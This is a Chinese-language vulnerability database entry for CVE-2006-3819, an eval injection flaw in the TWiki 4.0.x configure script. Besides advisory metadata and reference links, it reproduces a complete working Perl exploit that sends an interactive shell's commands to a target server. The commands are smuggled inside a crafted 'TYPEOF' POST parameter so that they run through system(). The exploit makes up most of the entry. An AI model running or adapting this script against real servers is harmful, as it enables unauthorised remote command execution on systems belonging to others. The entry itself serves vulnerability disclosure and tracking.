TWiki Configure Script TYPEOF参数Eval注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110751 漏洞类型 输入验证
发布时间 2006-08-07 更新时间 2006-08-08
CVE编号 CVE-2006-3819 CNNVD-ID CNNVD-200607-447
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2143
https://www.securityfocus.com/bid/19188
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-447
|漏洞详情
TWiki4.0.0到4.0.4中的配置脚本存在Eval注入漏洞。远程攻击者可以借助包含以"TYPEOF"开始的参数名称的HTTPPOST请求,执行任意Perl代码。
|漏洞EXP
#!/usr/bin/perl 
# Tue Aug  1 13:18:12 CEST 2006 jolascoaga@514.es
use strict;
use LWP::UserAgent;
use LWP::Simple;
use HTTP::Request;
use HTTP::Response;
use Getopt::Long;
$| = 1;   # couse 1 is bigger than 0
my ($proxy,$proxy_user,$proxy_pass);
my ($host,$debug,$dir, $command);
my $options = GetOptions (
  'host=s'	      => \$host, 
  'dir=s'	      => \$dir,
  'proxy=s'           => \$proxy,
  'proxy_user=s'      => \$proxy_user,
  'proxy_pass=s'      => \$proxy_pass,
  'debug'             => \$debug);
&help unless ($host); # you dont need root
$dir = "/twiki/bin/configure" unless($dir); # ... we have a template for this
print "$host - $dir\n";
while () {
		print "tinkiwinki> "; # phf haquerz style
		while(<STDIN>) {
				$command=$_;
				chomp($command);
				last;
		}
		&send($command);
}

sub send {
    my ($cmd) = @_;
    my $ok	=	0;
    my $socket;
    LWP::Debug::level('+') if $debug; # but remember this is crap :D
    my $ua = new LWP::UserAgent();   
    $ua->agent("safari/zoo"); 
    if ($host !~ /^http/) {
	$host = sprintf ("http://%s", $host); # CRAP CRAP CRAP
    }
    my $req = HTTP::Request->new(POST => $host.$dir);
    $req->content('action=update&TYPEOF%3A%29%3Bsystem%28%27'.$cmd.'%27%29%3Bmy+@a%3D%28=anything&submit=Submit');
    $ua->proxy(['http'] => $proxy) if $proxy;
    $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
    print $req->as_string() if $debug; 
    my $res = $ua->request($req);
    my $html = $res->content(); 
    $html =~ m/<body.*?>(.*?)<div/si; # <pus>
    print $1."\n";
    if ($debug) {
		open (DEBG, ">wikidebug");
		print DEBG $html;
    }
}
sub help {
    print "Syntax: ./$0 --host=url --dir=/horde [options]\n";
    print "\t--proxy (http), --proxy_user, --proxy_pass\n";
    print "\t--debug\n";
    print "the default directory is /twiki/bin/configure\n";
    print "\nExample\n";
    print "bash# $0 --host=http(s)://www.server.com/\n";
    print "\n";
    exit(1);
}
exit 0;
# <END OF EXPLOIT>

# milw0rm.com [2006-08-07]
|受影响的产品
TWiki TWiki 4.0.4 TWiki TWiki 4.0.3 TWiki TWiki 4.0.2 TWiki TWiki 4.0.1 TWiki TWiki 0
|参考资料

来源:VUPEN
名称:ADV-2006-2995
链接:http://www.frsirt.com/english/advisories/2006/2995
来源:twiki.org
链接:http://twiki.org/cgi-bin/view/Codev/SecurityAlertCmdExecWithConfigure
来源:XF
名称:twiki-configure-command-injection(28049)
链接:http://xforce.iss.net/xforce/xfdb/28049
来源:BID
名称:19188
链接:http://www.securityfocus.com/bid/19188
来源:OSVDB
名称:27556
链接:http://www.osvdb.org/displayvuln.php?osvdb_id=27556
来源:SECTRACK
名称:1016603
链接:http://securitytracker.com/id?1016603
来源:SECUNIA
名称:21235
链接:http://secunia.com/advisories/21235